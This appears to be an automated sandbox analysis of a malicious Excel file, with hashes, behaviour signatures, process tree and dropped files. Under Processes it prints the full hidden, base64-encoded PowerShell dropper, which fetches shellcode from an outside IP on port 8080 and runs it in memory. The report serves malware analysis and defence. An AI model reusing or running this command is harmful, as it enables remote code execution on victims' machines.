Analysis

  • max time kernel
    16s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
  • submitted
    13-11-2024 21:58

General

  • Target

    5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f.xls

  • Size

    46KB

  • MD5

    434d89ccf58222a7a8677f194a7eec0a

  • SHA1

    fe29a64739dea4e8bf40fa0a5e02e88bed417c32

  • SHA256

    5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f

  • SHA512

    2386756bf990e6b3b72baad089d87078fb3a837b0f1e1a1d4be4be582749eb8d2b74e8ba416aeed58dc6c3d2cf6436f9c9ac082ded470165f3601b81b9546cbe

  • SSDEEP

    768:d4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:qSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with the display window hidden.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ztdg0y54.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3004
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5A1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC5A0.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2452

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESC5A1.tmp

    Filesize

    1KB

    MD5

    96d3563fa093dde2099b93fb6f3c6053

    SHA1

    0053ec01c09a73af92c1d1c03e44a3ca674cc5e4

    SHA256

    6ef59f115a4c4f3c25ffe171be2b86371e6084fdee179ccd4cb1bc29caf966a4

    SHA512

    eb8052443bd3e88bf5758a0cddf9134568313fa6aaed150e0e26fe4bf2bf9a25d72198e353b4a6a81e7d836d9dfa41c40398b03225c11615f267acc6dcb9961a

  • C:\Users\Admin\AppData\Local\Temp\ztdg0y54.dll

    Filesize

    3KB

    MD5

    ded5c1d028402a58f25356d5965eb33e

    SHA1

    2cc7c6327e2f806c33e71ac97bbc47815302f105

    SHA256

    252bd54f2c4f254693a739af65427f62c3f4d8b59514613c332848fb7b836ecf

    SHA512

    6073aa86fc95cdeeaf59ec176c1489e90716b28d5ea4a0c43ee3a752a517886774b03871ec6f02eb4de46bcc9bd3254b7794ae35e2bafb67285aec4b1736b8f2

  • C:\Users\Admin\AppData\Local\Temp\ztdg0y54.pdb

    Filesize

    7KB

    MD5

    8086a47d28b8c125c8392c53f127ea57

    SHA1

    228a87d4f7f611ff1c147911c08b736f4ffd2490

    SHA256

    aca9e9e7902195692dc83d27dff689bb400e90c3ac9a1f286956bbf75b1407b6

    SHA512

    a3e316420fe3f743a88dc253bd11525cb00559dd025b4c0be44541e68c4ac049eb1e8c15edbe90aefc273a8db3025e83bbd54b940fee772577032322218304a5

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCC5A0.tmp

    Filesize

    652B

    MD5

    dc9eb10b07859e23d805cc32941918e7

    SHA1

    757fb1eb624141296c5c69383e573d6b886e5eb6

    SHA256

    792dd3954357714c0f76dcfdf5a82e73e74478716d9a44ec96a9c5295447675b

    SHA512

    1be67799830ed882664a33741f9d6ef1f821a0169741fd97b3d22341f181de696d803a05536de8746f8c82d96d12e8931df27a7ed8f66a754be5808a7be1d7ae

  • \??\c:\Users\Admin\AppData\Local\Temp\ztdg0y54.0.cs

    Filesize

    631B

    MD5

    f4dd5c682eb7b3b679f084261bfc7c4c

    SHA1

    70f75d7a4e42c185eb09139ed3c6f7338a2219c2

    SHA256

    2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

    SHA512

    8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

  • \??\c:\Users\Admin\AppData\Local\Temp\ztdg0y54.cmdline

    Filesize

    309B

    MD5

    cc13bf030191cde69868e4b27e748256

    SHA1

    7a985d84475dabb80d02aac739d3b24124e1d20c

    SHA256

    bb060f760a5b9ec469bb5f563ab0944aa837dae50f535a082465130d8da889ab

    SHA512

    ff24139b79333a0ec3f99c72074c69cee411133f3964431620280a7df60a4ad7e5104cfd94a0f16c3975e1ef246a4ce9e5ae7d82cf51dcf389ae6b9b837fbd12

  • memory/2988-8-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-6-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-4-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-7-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-9-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2988-3-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-2-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-1-0x000000007202D000-0x0000000072038000-memory.dmp

    Filesize

    44KB

  • memory/2988-27-0x000000007202D000-0x0000000072038000-memory.dmp

    Filesize

    44KB

  • memory/2988-28-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-29-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB